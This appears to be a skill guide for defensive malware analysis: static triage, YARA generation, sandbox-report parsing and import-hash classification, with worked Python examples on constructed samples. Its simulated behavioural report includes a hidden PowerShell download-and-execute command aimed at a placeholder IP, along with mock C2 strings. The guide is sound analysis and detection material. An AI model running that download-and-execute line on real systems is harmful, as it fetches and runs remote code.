Malware Analysis & Sandboxing


🦠 Malware Analysis & Sandboxing

Overview

This skill enables Claude to assist with malware analysis workflows including static analysis, dynamic/behavioral analysis, YARA rule generation, sandbox environment setup, and malware classification. Claude can interpret analysis results, identify malware families, and generate detection signatures.

⚠️ WARNING: Always handle malware samples in isolated, controlled environments. Never execute suspicious files on production systems. Use dedicated VMs or sandboxes.


Prerequisites

Required

  • Python 3.8+
  • yara-python, pefile (hashlib ships with the Python standard library and needs no install)

Optional

  • YARA — Pattern matching for malware
  • Cuckoo Sandbox / CAPE — Automated dynamic analysis
  • Docker — Container-based isolation
  • Volatility — Memory analysis
  • VirusTotal API — Multi-engine scanning
  • Ghidra — Binary reverse engineering

```bash
pip install yara-python pefile python-magic requests ssdeep
```

python-magic needs the libmagic shared library and ssdeep needs libfuzzy on the host; install those through the OS package manager before running pip.

Core Capabilities

1. Static Malware Analysis

Analyze malware without execution:

When the user asks to analyze a malware sample:

  1. Calculate cryptographic hashes (MD5, SHA-1, SHA-256, Imphash, SSDeep)
  2. Identify file type and format (PE, ELF, script, document, etc.)
  3. Calculate entropy to detect packing or encryption
  4. Extract embedded strings (C2 URLs, IPs, registry keys, mutex names)
  5. Analyze imports/exports for suspicious API calls
  6. Identify packing/obfuscation (UPX, Themida, custom packers)
  7. Extract embedded resources and overlays
  8. Check for known malware signatures
  9. Map suspicious APIs to MITRE ATT&CK techniques
  10. Generate IOCs (hashes, strings, network indicators)

Suspicious API Categories:

| Category | APIs | ATT&CK |
|---|---|---|
| Process Injection | CreateRemoteThread, WriteProcessMemory, VirtualAllocEx, NtMapViewOfSection | T1055 |
| Persistence | RegSetValueEx, RegCreateKeyEx (Run keys), CreateService; scheduled tasks usually show up as a `schtasks.exe` child process or ITaskService COM calls rather than as a direct import | T1547.001, T1543.003, T1053.005 |
| Execution | WinExec, ShellExecuteEx, CreateProcess | T1059, T1106 |
| Anti-Analysis | IsDebuggerPresent, CheckRemoteDebuggerPresent; GetTickCount and QueryPerformanceCounter used as timing checks around sleeps | T1622, T1497.003 |
| Network | InternetOpenUrl, HttpSendRequest, WSAStartup, connect, URLDownloadToFile | T1071, T1105 |
| Crypto | CryptEncrypt, CryptDecrypt, CryptHashData, BCryptEncrypt (config or C2 obfuscation, or file encryption in ransomware) | T1027, T1573, T1486 |
| File Operations | CreateFileW, WriteFile, DeleteFileW, MoveFileW (noisy in benign software; weigh by what is written or deleted) | T1070.004 |
| Keylogging | SetWindowsHookEx, GetAsyncKeyState, GetKeyState | T1056.001 |

Every one of these APIs is also imported by legitimate software. Flag combinations (for example VirtualAllocEx + WriteProcessMemory + CreateRemoteThread together with OpenProcess), not single imports.
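
The static steps above, carried through on a file image. This is an added example written for this page, not the skill's own static_analyzer.py: it uses only the standard library, so instead of parsing a PE import table it recovers Win32 API names from the ASCII/UTF-16LE string table (where the import name table survives as plain strings) and matches them against a small suspicious-API map. The ATT&CK mapping in the code is the example's own, and SAMPLE is constructed here to exercise every stage, with a permutation of all 256 byte values standing in for a packed section.

```python
"""Static triage of a suspect file image without executing it.

Added example for this page (not the skill's static_analyzer.py). Standard
library only: Win32 API names are taken from the string table rather than
from a parsed import table. The ATT&CK mapping is this example's own.
"""
import hashlib
import math
import re
from collections import Counter

MAGIC = [(b"MZ", "PE"), (b"\x7fELF", "ELF"), (b"%PDF", "PDF"),
         (b"PK\x03\x04", "ZIP/OOXML"), (b"\xd0\xcf\x11\xe0", "OLE2"), (b"#!", "script")]

# API base name (A/W suffix stripped) -> (category, ATT&CK technique)
SUSPICIOUS_APIS = {
    "VirtualAllocEx": ("Process Injection", "T1055"),
    "WriteProcessMemory": ("Process Injection", "T1055"),
    "CreateRemoteThread": ("Process Injection", "T1055"),
    "RegSetValueEx": ("Persistence", "T1547.001"),
    "CreateService": ("Persistence", "T1543.003"),
    "IsDebuggerPresent": ("Anti-Analysis", "T1622"),
    "URLDownloadToFile": ("Network", "T1105"),
    "InternetOpenUrl": ("Network", "T1071.001"),
    "SetWindowsHookEx": ("Keylogging", "T1056.001"),
}
ASCII_RE = re.compile(rb"[\x20-\x7e]{5,}")
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){5,}")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
IPV4_RE = re.compile(r"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
REG_RE = re.compile(r"HK(?:LM|CU|CR|U|CC|EY_[A-Z_]+)\\[^\s\"']+")


def identify(data: bytes) -> str:
    return next((name for magic, name in MAGIC if data.startswith(magic)), "unknown")


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 256, threshold: float = 7.2) -> list:
    """Offsets of fixed-size windows whose entropy points at packed or encrypted data."""
    return [off for off in range(0, len(data) - window + 1, window)
            if shannon_entropy(data[off:off + window]) >= threshold]


def extract_strings(data: bytes) -> list:
    ascii_strs = [m.group().decode("ascii") for m in ASCII_RE.finditer(data)]
    wide_strs = [m.group().decode("utf-16-le") for m in WIDE_RE.finditer(data)]
    return ascii_strs + wide_strs


def extract_iocs(strings: list) -> dict:
    joined = "\n".join(strings)
    return {
        "urls": sorted(set(URL_RE.findall(joined))),
        "ipv4": sorted(set(IPV4_RE.findall(joined))),
        "registry": sorted(set(REG_RE.findall(joined))),
        "mutexes": sorted(s for s in strings if s.startswith(("Global\\", "Local\\"))),
    }


def map_apis(strings: list) -> dict:
    """API names found in the string table -> (category, ATT&CK technique)."""
    hits = {}
    for s in strings:
        base = s[:-1] if s.endswith(("A", "W")) and s[:-1] in SUSPICIOUS_APIS else s
        if base in SUSPICIOUS_APIS:
            hits[s] = SUSPICIOUS_APIS[base]
    return hits


def triage(data: bytes) -> dict:
    strings = extract_strings(data)
    apis = map_apis(strings)
    windows = high_entropy_windows(data)
    return {
        "file_type": identify(data),
        "size": len(data),
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
        "entropy": round(shannon_entropy(data), 3),
        "high_entropy_windows": windows,
        "packed_suspected": bool(windows),
        "iocs": extract_iocs(strings),
        "suspicious_apis": apis,
        "attack_techniques": sorted({tech for _, tech in apis.values()}),
    }


# Constructed sample: fake DOS header, an import-name-table-like run of API
# names, a wide-string Run key, a C2 URL and a mutex, then 1024 bytes standing
# in for a packed section (a permutation of all 256 byte values, entropy 8.0).
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"kernel32.dll\x00VirtualAllocEx\x00WriteProcessMemory\x00CreateRemoteThread\x00"
    + b"IsDebuggerPresent\x00urlmon.dll\x00URLDownloadToFileA\x00"
    + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run".encode("utf-16-le") + b"\x00\x00"
    + b"http://203.0.113.7/gate.php\x00Global\\MtxC2Loader\x00"
    + bytes((i * 167 + 13) % 256 for i in range(1024))
)

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

On a real sample, swap the string-table lookup for `pefile.PE(path).DIRECTORY_ENTRY_IMPORT` so that APIs resolved at runtime via GetProcAddress (which never appear as imports) are not mistaken for the absence of a capability; the windowed entropy is what tells you that a section, not just the whole file, is packed.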

2. YARA Rule Generation

Create detection rules from samples:

When the user asks to create YARA rules:

  1. Extract unique byte sequences from the sample
  2. Identify distinctive strings and patterns
  3. Select stable indicators unlikely to change between variants (mutex names, C2 URI formats, PDB paths, custom error strings), not header bytes or library imports that every PE shares
  4. Write YARA rules with proper metadata
  5. Test rules against the sample and a benign corpus for false positives
  6. Optimize rules for performance (avoid strings shorter than four bytes, regexes with unbounded repetition, and hex patterns that open with wildcards)
  7. Keep the condition cheap and tolerant: header magic and filesize checks first, then a threshold such as "N of ($s*)" rather than "all of them", so one changed string in a new variant does not break detection

YARA Rule Template:

```yara
rule MalwareFamily_Variant : tag1 tag2 {
    meta:
        author = "Analyst Name"
        description = "Detects [Malware Family] [Variant]"
        date = "2024-01-01"
        hash = "sha256_hash"
        reference = "https://example.com/report"
        tlp = "CLEAR"   // TLP 2.0 name for what TLP 1.0 called WHITE

    strings:
        $s1 = "unique_string_1" ascii wide
        // hex pattern with wildcards and a jump; never use DOS/PE header bytes
        // such as 4D 5A here, they match every executable
        $s2 = { 6A 40 68 00 30 00 00 [4-8] FF 15 ?? ?? ?? ?? }
        $s3 = /regex_pattern/

    condition:
        uint16(0) == 0x5A4D and
        filesize < 5MB and
        2 of ($s*)
}
```
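
Steps 1 to 5 of the procedure above, as a small generator. This is an added example for this page and not the skill's yara_generator.py: using only the standard library it extracts printable strings from each file image, keeps the ones present in every malicious sample and in no benign sample, drops library noise, and emits rule text with a majority threshold in the condition. The byte strings it runs on are constructed; the emitted rule is meant to be compiled with yara or yara-python and run back over the samples.

```python
"""Derive a YARA rule from strings shared by a family and absent from benign files.

Added example for this page, not the skill's yara_generator.py. Standard
library only; the file images below are constructed.
"""
import re
from datetime import date

STRING_RE = re.compile(rb"[\x20-\x7e]{6,}")
RULE_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
# Present in nearly every PE; never a useful indicator on its own.
NOISE = {"!This program cannot be run in DOS mode.", "kernel32.dll", "KERNEL32.dll",
         ".text", ".rdata", ".data"}


def strings_of(data: bytes) -> set:
    return {m.group().decode("ascii") for m in STRING_RE.finditer(data)}


def select_indicators(malicious: list, benign: list, max_strings: int = 6) -> list:
    """Strings in every malicious sample, in no benign sample, not noise; most distinctive first."""
    shared = set.intersection(*(strings_of(d) for d in malicious))
    seen_benign = set().union(*(strings_of(d) for d in benign)) if benign else set()
    candidates = [s for s in shared - seen_benign - NOISE if len(s) >= 8]
    # Longer strings with more distinct characters collide less often with clean files.
    candidates.sort(key=lambda s: (len(set(s)), len(s)), reverse=True)
    return candidates[:max_strings]


def yara_escape(s: str) -> str:
    return s.replace("\\", "\\\\").replace('"', '\\"')


def build_rule(name: str, indicators: list, sha256s: list, max_size: str = "5MB",
               author: str = "analyst") -> str:
    if not RULE_NAME_RE.match(name):
        raise ValueError(f"invalid YARA identifier: {name!r}")
    if len(indicators) < 2:
        raise ValueError("need at least two stable indicators for a usable rule")
    # Majority threshold: one renamed artifact in a new variant does not break the rule.
    needed = max(2, (len(indicators) + 1) // 2)
    lines = [f"rule {name} : generated", "{", "    meta:",
             f'        author = "{author}"',
             f'        date = "{date.today().isoformat()}"',
             f'        description = "Auto-generated from {len(sha256s)} samples"']
    lines += [f'        hash{i + 1} = "{h}"' for i, h in enumerate(sha256s)]
    lines += ["", "    strings:"]
    lines += [f'        $s{i + 1} = "{yara_escape(s)}" ascii wide' for i, s in enumerate(indicators)]
    lines += ["", "    condition:",
              "        uint16(0) == 0x5A4D and",
              f"        filesize < {max_size} and",
              f"        {needed} of ($s*)", "}"]
    return "\n".join(lines)


# Constructed file images: three variants of one loader plus two clean files.
# LoadLibraryA/GetProcAddress appear in all of them and must not be selected.
COMMON = (b"MZ\x90\x00!This program cannot be run in DOS mode.\x00"
          b"kernel32.dll\x00LoadLibraryA\x00GetProcAddress\x00")
FAMILY = b"Global\\MtxC2Loader\x00/gate.php?id=%s\x00C:\\Users\\dev\\loader\\bin\\Release\\loader.pdb\x00"
MALICIOUS = [COMMON + FAMILY + b"build 1\x00",
             COMMON + FAMILY + b"build 2\x00",
             COMMON + b"/gate.php?id=%s\x00" + FAMILY + b"build 3\x00"]
BENIGN = [COMMON + b"notepad.exe\x00Segoe UI\x00", COMMON + b"MessageBoxW\x00"]

if __name__ == "__main__":
    print(build_rule("Loader_Family", select_indicators(MALICIOUS, BENIGN),
                     ["<sha256 of each sample>"]))
```

The benign set matters more than the malicious one: a generator that only looks at the family will happily pick compiler runtime strings, which is how auto-generated rules end up matching every MSVC binary in the estate.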

3. Dynamic/Behavioral Analysis

Guide sandbox-based analysis:

When the user asks for dynamic analysis:

  1. Recommend appropriate sandbox environment
  2. Configure monitoring (API hooks, network capture, filesystem monitoring)
  3. Suggest detonation parameters (timeout, user simulation)
  4. Analyze behavioral reports (process trees, file modifications, registry changes)
  5. Map behaviors to MITRE ATT&CK techniques
  6. Identify C2 communication patterns
  7. Extract dropped files and secondary payloads
  8. Correlate static and dynamic findings
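
Steps 4 to 7 of the dynamic procedure, applied to a behavioural report. This is an added example for this page and is not Cuckoo or CAPE code: the JSON it parses is constructed with a simplified schema (processes with pid/ppid, written files and registry values, timestamped outbound connections), so the accessors must be adapted to the field names of a real report. It renders the process tree, picks out dropped executables and Run-key persistence, maps what it finds to ATT&CK, and flags a destination contacted at near-constant intervals as a beaconing candidate.

```python
"""Summarise a sandbox behavioural report and flag C2-like beaconing.

Added example for this page; not Cuckoo or CAPE code. REPORT is constructed
with a simplified schema that stands in for a real report.
"""
import json
from collections import defaultdict
from statistics import mean, pstdev

REPORT = json.loads(r"""
{
  "processes": [
    {"pid": 100, "ppid": 1,   "name": "explorer.exe"},
    {"pid": 200, "ppid": 100, "name": "invoice.exe"},
    {"pid": 300, "ppid": 200, "name": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.9/s.ps1')\""},
    {"pid": 400, "ppid": 200, "name": "svchost.exe"}
  ],
  "files_written": [
    "C:\\Users\\victim\\AppData\\Roaming\\update.exe",
    "C:\\Users\\victim\\AppData\\Local\\Temp\\tmp1.dat"
  ],
  "registry_written": [
    "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"
  ],
  "connections": [
    {"ts": 1.0,   "dst": "203.0.113.7",  "port": 443},
    {"ts": 61.2,  "dst": "203.0.113.7",  "port": 443},
    {"ts": 120.9, "dst": "203.0.113.7",  "port": 443},
    {"ts": 181.1, "dst": "203.0.113.7",  "port": 443},
    {"ts": 5.0,   "dst": "198.51.100.9", "port": 80}
  ]
}
""")

PAYLOAD_EXT = (".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".scr")


def process_tree(report: dict) -> list:
    """Indented 'name (pid)' lines, children ordered by pid."""
    by_pid = {p["pid"]: p for p in report["processes"]}
    children = defaultdict(list)
    for p in report["processes"]:
        children[p["ppid"]].append(p)
    lines = []

    def walk(proc, depth):
        lines.append(f"{'  ' * depth}{proc['name']} ({proc['pid']})")
        for child in sorted(children[proc["pid"]], key=lambda c: c["pid"]):
            walk(child, depth + 1)

    for root in (p for p in report["processes"] if p["ppid"] not in by_pid):
        walk(root, 0)
    return lines


def dropped_payloads(report: dict) -> list:
    return [f for f in report["files_written"] if f.lower().endswith(PAYLOAD_EXT)]


def persistence_keys(report: dict) -> list:
    return [k for k in report["registry_written"] if "\\currentversion\\run" in k.lower()]


def beacon_candidates(report: dict, min_connections: int = 3, max_jitter: float = 0.1) -> dict:
    """Destinations contacted repeatedly at near-constant intervals (jitter = stdev/mean)."""
    by_dst = defaultdict(list)
    for c in report["connections"]:
        by_dst[f"{c['dst']}:{c['port']}"].append(c["ts"])
    found = {}
    for dst, times in by_dst.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else float("inf")
        if jitter <= max_jitter:
            found[dst] = {"connections": len(times), "mean_interval": round(avg, 1),
                          "jitter": round(jitter, 3)}
    return found


def summarize(report: dict) -> dict:
    beacons = beacon_candidates(report)
    techniques = set()
    if persistence_keys(report):
        techniques.add("T1547.001")           # Run key persistence
    for p in report["processes"]:
        if p["name"].lower() == "powershell.exe":
            techniques.add("T1059.001")       # PowerShell
            if "downloadstring" in p.get("cmdline", "").lower():
                techniques.add("T1105")       # Ingress Tool Transfer
    if beacons:
        techniques.add("T1071")               # Application Layer Protocol C2
    return {"process_tree": process_tree(report), "dropped_payloads": dropped_payloads(report),
            "persistence": persistence_keys(report), "beacons": beacons,
            "attack_techniques": sorted(techniques)}


if __name__ == "__main__":
    print(json.dumps(summarize(REPORT), indent=2))
```

The jitter threshold is the knob to tune: implants with randomised sleep will exceed 0.1, so on real traffic lower the bar and pair the interval test with the static IOCs (the same host in the strings and in the pcap is stronger evidence than either alone).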

4. Malware Classification & Family Identification

Classify unknown samples:

When the user asks to classify malware:

  1. Compare hashes against known malware databases (VirusTotal, MalwareBazaar)
  2. Analyze behavioral patterns for family indicators
  3. Check for known packer/crypter signatures
  4. Compare string patterns with known families
  5. Use similarity hashes: ssdeep (or TLSH) over file content and imphash over the import table. Neither is function-level: packing defeats ssdeep, and imphash collides across unrelated samples built with the same toolchain or packer stub, so treat a match as a lead, not an identification
  6. Map to known threat actor campaigns
  7. Assign a confidence level to the classification and state which evidence supports it
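
Step 5 and the confidence level of step 7, made concrete. This is an added example for this page and is neither pefile's nor the skill's code: imphash() reproduces the normalisation pefile.get_imphash() applies (lower-case "dll.func" pairs in import-table order, .dll/.ocx/.sys stripped, unnamed imports as "ordN", comma-joined, MD5), with one known gap, namely that pefile also maps ordinals of ws2_32 and oleaut32 to function names and this example does not. The import tables are constructed as (dll, [name or ordinal]) lists; the Jaccard check shows what imphash misses when a relink reorders imports, and the packer-stub check shows when neither measure should be trusted.

```python
"""Import-table similarity for family classification.

Added example for this page; neither pefile's nor the skill's code. The
import tables below are constructed.
"""
import hashlib


def _norm(dll: str, func) -> str:
    """pefile-style normalisation: lower-case, DLL extension stripped, ordinals as ordN."""
    dll = dll.lower()
    for ext in (".dll", ".ocx", ".sys"):
        if dll.endswith(ext):
            dll = dll[: -len(ext)]
            break
    name = f"ord{func}" if isinstance(func, int) else func
    return f"{dll}.{name}".lower()


def imphash(imports: list) -> str:
    """Order-sensitive: the same imports in a different order give a different hash."""
    parts = [_norm(dll, f) for dll, funcs in imports for f in funcs]
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def import_set(imports: list) -> set:
    return {_norm(dll, f) for dll, funcs in imports for f in funcs}


def jaccard(a: list, b: list) -> float:
    """Order-insensitive overlap of two import sets, 0.0 to 1.0."""
    sa, sb = import_set(a), import_set(b)
    return len(sa & sb) / len(sa | sb) if sa | sb else 0.0


def is_packer_stub(imports: list, max_imports: int = 8) -> bool:
    """A tiny table that only resolves a loader's needs means the real imports are
    rebuilt at runtime; any similarity then describes the packer, not the family."""
    names = import_set(imports)
    return len(names) <= max_imports and {"kernel32.loadlibrarya", "kernel32.getprocaddress"} <= names


def classify(unknown: list, reference: list, family: str) -> dict:
    if is_packer_stub(unknown):
        return {"family": None, "confidence": "none", "reason": "packer stub import table; unpack first"}
    if imphash(unknown) == imphash(reference):
        return {"family": family, "confidence": "high", "reason": "identical imphash"}
    sim = jaccard(unknown, reference)
    if sim >= 0.8:
        return {"family": family, "confidence": "medium", "reason": f"import-set Jaccard {sim:.2f}"}
    return {"family": None, "confidence": "low", "reason": f"import-set Jaccard {sim:.2f}"}


# Constructed import tables as (dll, [function name or int ordinal]).
KNOWN_LOADER = [("KERNEL32.dll", ["VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread", "OpenProcess"]),
                ("ADVAPI32.dll", ["RegSetValueExA", "RegCreateKeyExA"]),
                ("WININET.dll", ["InternetOpenUrlA", "InternetReadFile"])]
RECASED = [(dll.upper(), funcs) for dll, funcs in KNOWN_LOADER]     # same table, different casing
REORDERED = [KNOWN_LOADER[2], KNOWN_LOADER[0], KNOWN_LOADER[1]]      # same imports, new link order
UNRELATED = [("KERNEL32.dll", ["VirtualAlloc", "CreateThread", "OpenProcess"]),
             ("WS2_32.dll", [23, 2, 3])]                              # ordinal-only Winsock imports
UPX_STUB = [("KERNEL32.DLL", ["LoadLibraryA", "GetProcAddress", "VirtualProtect",
                              "VirtualAlloc", "VirtualFree", "ExitProcess"])]

if __name__ == "__main__":
    for label, table in [("recased", RECASED), ("reordered", REORDERED),
                         ("unrelated", UNRELATED), ("upx stub", UPX_STUB)]:
        print(f"{label:10} {imphash(table)} {classify(table, KNOWN_LOADER, 'Loader')}")
```

The four constructed tables cover the cases an analyst meets in practice: a recompiled build that keeps its imphash, a relinked build that loses it but keeps the same import set, an unrelated sample that shares only OpenProcess, and a UPX-style stub whose import table says nothing about the payload.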

5. Sandbox Environment Setup

Guide secure analysis environment creation:

When the user asks to set up a sandbox:

  1. VM configuration (host-only or fully isolated network, a clean snapshot to revert to after every detonation, minimal OS)
  2. Analysis tool installation checklist
  3. Network monitoring setup (INetSim, FakeDNS) so the sample gets plausible answers without reaching the internet
  4. Hide hypervisor artifacts the sample may check (VM MAC address prefixes, guest-tools drivers and services, BIOS and registry vendor strings) and give the guest realistic uptime, user files and screen resolution
  5. Automated analysis pipeline configuration
  6. Data collection and evidence preservation (hash every artifact; keep the pcap and memory image alongside the report)

Usage Instructions

Example Prompts

> Perform static analysis on this suspicious PE file
> Generate YARA rules from these malware samples
> Set up a malware analysis sandbox with Docker
> What MITRE ATT&CK techniques does this malware use?
> Create a behavioral analysis report from this Cuckoo sandbox output
> Classify this sample — what malware family does it belong to?

Script Reference

static_analyzer.py

```bash
python scripts/static_analyzer.py --file malware.exe --output report.json
python scripts/static_analyzer.py --file sample.dll --hashes --strings --imports
```

yara_generator.py

```bash
python scripts/yara_generator.py --samples ./malware_samples/ --output rules.yar
python scripts/yara_generator.py --file single_sample.exe --rule-name "MyMalware" --output rule.yar
```

Integration Guide

Chaining with Other Skills

  • ← Threat Hunting (06): Receive suspicious samples identified during hunts
  • ← Incident Response (07): Analyze malware collected during IR engagements
  • → Reverse Engineering (04): Deep-dive into complex samples
  • → Blue Team Defense (15): Generate detection signatures from analysis
  • → Threat Hunting (06): Feed IOCs back for environment-wide hunting
